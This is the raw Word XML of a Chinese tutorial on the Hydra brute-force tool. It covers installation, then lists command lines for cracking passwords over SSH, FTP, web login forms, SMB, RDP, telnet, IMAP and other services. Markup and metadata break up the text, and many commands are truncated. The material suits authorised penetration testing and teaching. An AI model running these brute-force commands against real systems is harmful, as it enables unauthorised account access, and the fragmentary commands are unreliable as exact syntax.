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Hydra介绍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Hydra也叫九头蛇，是一款开源的暴力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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>工具。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Hydra安装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（一）Window环境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hydra-8.1-windows.zip解压后使用，通过cmd进入命令行，使用hydra -h查看是否安装成功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7960" cy="275082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（二）Linux环境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kali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1.在kali中打开终端，直接输入hydra，可以看到hydra的版本、参数、以及可以爆破的协议。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4881880" cy="390842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3492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举个栗子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爆破SSH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用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 参数指定用户名，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>参数指定密码，后面直接跟目标的IP地址和协议。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hydra -l root -p 12345678 192.168.31.173 ssh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34493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破解成功，直接显示结果。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其他类型密码破解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1.破解ftp：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ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV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ip ftp -l 用户名 -P 密码字典 -e ns -vV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get方式提交，破解web登录：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用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/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用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php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post方式提交，破解web登录：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该软件的强大之处就在于支持多种协议的破解，同样也支持对于web用户界面的登录破解，get方式提交的表单比较简单，这里通过post方式提交密码破解提供思路。该工具有一个不好的地方就是，如果目标网站登录时候需要验证码就无法破解了。带参数破解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action="index.php" method="POST"&gt;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type="text" name="name" /&gt;&lt;BR&gt;&lt;br&gt;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type="password" name="pwd" /&gt;&lt;br&gt;&lt;br&gt;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type="submit" name="sub" value="提交"&gt;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假设有以上一个密码登录表单，我们执行命令：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admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^&amp;pwd=^PASS^:&lt;title&gt;invalido&lt;/title&gt;”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说明：破解的用户名是admin，密码字典是pass.lst，破解结果保存在ok.lst，-t 是同时线程数为1，-f 是当破解了一个密码就停止，ip 是本地，就是目标ip，http-post-form表示破解是采用http 的post 方式提交的表单密码破解。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后面参数是网页中对应的表单字段的name 属性，后面&lt;title&gt;中的内容是表示错误猜解的返回信息提示，可以自定义。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2.破解https：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-m /index.php -l muts -P pass.txt 10.36.16.18 https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3.破解teamspeak：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用户名 -P 密码字典 -s 端口号 -vV ip teamspeak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4.破解cisco：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-P pass.txt 10.36.16.18 cisco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-m cloud -P pass.txt 10.36.16.18 cisco-enable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5.破解smb：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administrator -P pass.txt 10.36.16.18 smb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6.破解pop3：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muts -P pass.txt my.pop3.mail pop3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7.破解rdp：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ip rdp -l administrator -P pass.txt -V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8.破解http-proxy：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admin -P pass.txt http-proxy://10.36.16.18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9.破解imap：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-L user.txt -p secret 10.36.16.18 imap PLAIN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-C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN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10.破解telnet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hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V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DE2CD7"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="70DE2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59F5120"/>
    <w:rsid w:val="60C43183"/>
    <w:rsid w:val="7DBA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749</Words>
  <Characters>1669</Characters>
  <Lines>1</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>96</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1853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2023-05-16T07:38:00Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>澜绘酱</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-23T16:06:50Z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8DEFAD4FD09C4808B19ED0C08FDDB6C2_12</vt:lpwstr>
  </property>
</Properties>
</file>